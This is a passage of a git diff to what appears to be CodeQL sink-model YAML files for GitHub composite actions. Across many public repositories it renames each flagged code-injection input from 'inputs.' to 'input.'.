@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] - - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 7767c649780..1a92afe11a4 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.token", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"] - - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"] \ No newline at end of file + - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.token", "code-injection", "generated"] + - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 419909764b7..38f2399b368 100644 
--- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"] - - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"] \ No newline at end of file + - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6e2b5247f29..36e983b8039 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"] - - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index d012a6f2fbb..006a53e8376 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index aead619b40b..5410cb3ff30 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"] - - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index b82360205f7..124b3cf2a5a 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["primer/react", "*", "inputs.token", "code-injection", "generated"] - - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"] \ No newline at end of file + - ["primer/react", "*", "input.token", "code-injection", "generated"] + - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index e5fad4e5256..8542583f3d9 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"] - - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 71f90682b1b..e85e58fb40a 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"] - - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"] \ No newline at end of file + - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 07421b98859..d2005f3788a 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["psf/black", "*", "inputs.summary", "code-injection", "generated"] \ No newline at end of file + - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 81fbb3ae9e4..7340dfccdd0 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 9587351ce1d..70022866bdd 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"] - - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"] \ No newline at end of file + - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 080835504a6..f7bd43cbc1e 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"] \ No newline at end of file + - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 86ce393fbc5..d85a35580b6 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"] - - ["python/mypy", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 182558589d7..ee0b51c72b4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 1839670baa2..524a1f54ae4 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.token", "code-injection", "generated"] - - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"] \ No newline at end of file + - ["quay/clair", "*", "input.tag", "code-injection", "generated"] + - ["quay/clair", "*", "input.repo", "code-injection", "generated"] + - ["quay/clair", "*", "input.quay", "code-injection", "generated"] + - ["quay/clair", "*", "input.duration", "code-injection", "generated"] + - ["quay/clair", "*", "input.token", "code-injection", "generated"] + - ["quay/clair", "*", "input.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 203dabaa3b9..310f11ed160 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"] - - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 7247d125324..441b824581c 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"] - - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"] \ No newline at end of file + - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.build_args", "code-injection", 
"generated"] + - ["r-lib/actions", "*", "input.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 22c8a56deac..19f9f7a03bb 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"] - - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["randombit/botan", "*", "input.target", "code-injection", "generated"] + - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 7476425a35f..1ca71afacc7 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"] - - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"] \ No newline at end of file + - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 3c96c1b159d..9f0ff2c86de 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"] \ No newline at end of file + - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index da9def79964..abb6c432aef 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"] - - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"] \ No newline at end of file + - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 80c91739684..6548880f59e 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file + - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 2121bb23710..5401d176051 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"] \ No newline at end of file + - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index f0acc305672..70cf81f1b78 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"] - - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file + - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index f099314b16e..eccccba83fe 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"] - - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"] \ No newline at end of file + - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 971cd92e3cd..b7133aae304 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"] - - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 42aba6b02dd..26d7b448269 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 71d71f6cb21..7600cd4bdde 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 60a29d3edf7..dd79b0845dd 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 84d174e5a05..71bdd001458 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 5cc3a3a7475..3b3262f93a9 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml 
